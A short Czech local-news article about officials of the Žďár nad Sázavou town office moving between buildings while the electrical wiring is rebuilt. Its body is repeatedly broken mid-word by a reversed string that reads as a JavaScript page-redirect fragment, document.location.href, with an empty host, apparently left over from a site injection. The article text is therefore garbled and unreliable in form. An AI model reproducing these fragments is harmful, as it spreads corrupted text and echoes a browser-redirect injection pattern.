Rainbow page separator

Kvůli opravě elektroinstalace se úředníci postupně stěhují

Úterý, 26. dubna 2016

Městský úřad Žďár nad Sázavou

Žďár nad Sázavou / Až do konce lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu se budou muset klienti žďárského úřadu v Žižkově ulici smířit s drobnými problémy při vyřizování svých záleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostí. Souvisí [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to s rekonstrukcí elektroinstalace, která v budově probíhá, a kvůli níž jsou některé kanceláře dočasně přemísťovány.
Aktuálně se uskutečňuje oprava ve čtvrtém patře levé části městského úřadu. Do druhého patra sousední budovy úřadu práce v Komenského ulici jsou pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to přemístěni pracovníci odboru komunálních služeb a odboru majetkoprávního, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to přibližně do konce dubna. „Klienti mohou využít dočasně obnovený průchod mezi oběma budovami přes takzvaný propojovací krček mezi třetím a čtvrtým patrem,“ informovala mluvčí žďárské radnice Nikola Adlerová.
Aktuální informace jsou k dispozici na webu města, případně je klientům podají pracovnice informační kanceláře u vstupu do budovy městského úřadu.